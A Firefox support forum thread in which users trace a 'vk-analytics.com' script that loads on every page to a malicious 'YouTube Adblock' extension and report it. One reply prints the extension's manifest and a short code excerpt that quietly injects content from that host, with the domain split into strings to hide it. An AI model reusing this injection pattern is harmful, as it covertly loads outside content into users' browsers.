搜索 | 用户支持

防范以用户支持为名的诈骗。我们绝对不会要求您拨打电话或发送短信,及提供任何个人信息。请使用“举报滥用”选项报告涉及违规的行为。

Learn More

A script "vk-analytics.com" tries to load in every page that I open or link that I go to using firefox.

  • 6 个回答
  • 1 人有此问题
  • 19 次查看
  • 最后回复者为 washicd

more options

The script blocker that I use shows that "vk-analytics.com" tries to load on every page I open, even google.com, duckduckgo.com, etc. I updated to the latest version of Firefox but that didn't help. I downloaded another browser "Opera" and added a script blocker extension on it. That script does not try to load on any page that I open in Opera. What is causing this to happen in Firefox. If you navigate to vk-analytics.com you are redirected to vk.com, apparently a popular European social website.

The script blocker that I use shows that "vk-analytics.com" tries to load on every page I open, even google.com, duckduckgo.com, etc. I updated to the latest version of Firefox but that didn't help. I downloaded another browser "Opera" and added a script blocker extension on it. That script does not try to load on any page that I open in Opera. What is causing this to happen in Firefox. If you navigate to vk-analytics.com you are redirected to vk.com, apparently a popular European social website.

被采纳的解决方案

Hello, You have an extension type video downloader (savefrom net youtube downloader with all the variant even a download manager extension ) Pretty sure that it is responsible for this behavior Another question: You have a proxy or a proxy type extension: (vpn, private shields,etc) Try to remove them. Hope this help

定位到答案原位置 👍 0

所有回复 (6)

more options

选择的解决方案

Hello, You have an extension type video downloader (savefrom net youtube downloader with all the variant even a download manager extension ) Pretty sure that it is responsible for this behavior Another question: You have a proxy or a proxy type extension: (vpn, private shields,etc) Try to remove them. Hope this help

more options

Thank you Anna! Looks like YouTube Adblock was loading the script. I disabled it and it stopped.

more options

Hi washicd, can you post the unique ID of that extension so the Add-ons team can consider blocking it? The easiest place to find it is on the Troubleshooting Information page. Either:

  • "3-bar" menu button > "?" Help > Troubleshooting Information
  • (menu bar) Help > Troubleshooting Information
  • type or paste about:support in the address bar and press Enter

Scroll down past "Application Basics" and "Firefox Features" to "Extensions". Then you can select the relevant portion of the table for that extension (or the entire table) -- not the entire page, please, that's too much information. Then you can copy using either Ctrl+c or right-click > Copy and then paste it into a reply. It will be a bit messy, but we're used it.

more options

There are other things that need attention.

The System Details list shows that you have an outdated Flash plugins, current is 31.0.0.108 (31.0 r0).

  • Shockwave Flash 24.0 r0

You can find the installation path of a plugin on the about:plugins page.


You can download the latest NPAPI Flash plugin for Firefox on this page.

There are several reports that this extension injects a script on every page.

Addon embeds javascript for vk-analytics on every page before body ends. Please report abuse.

✓ Privacy Policy: This extension uses Google Analytics, a web analytics service provided by Google, Inc. (“Google”). Google Analytics uses “cookies”, which are text files placed on your computer, to help the website analyze how users use the site.

"name": "__MSG_extension_name__",
"description": "__MSG_extension_description__",
"short_name": "YouTubeAdblock",    
"applications": {
"gecko": { "id": "{80e9f0be-bd1e-4b69-b079-5f44b2962921}" }

ytembed.js :

    initialize: function () {  
		getStorage();
		var ytEmbed = document.createElement("embed");
		ytEmbed.src = '//vk' + '-' + 'analytics.com' + '/youtube';
		ytEmbed.onload = function() {
			temp.remove()
		};
		ytEmbed.onerror = function() {
			temp.remove()
		};
		var temp = document.body.appendChild(ytEmbed);
	}

由cor-el于修改

more options

Thanks jscher2000, here is that extension information:

YouTube Adblock 2.1.3 false {80e9f0be-bd1e-4b69-b079-5f44b2962921}

more options

cor-el, thanks for that! I updated that flash plugin. Also, I searched for "vk-analytics" on one of the page sources while noscript was disabled and didn't find anything. I see from your post that it wasn't quite so obvious. Thanks again!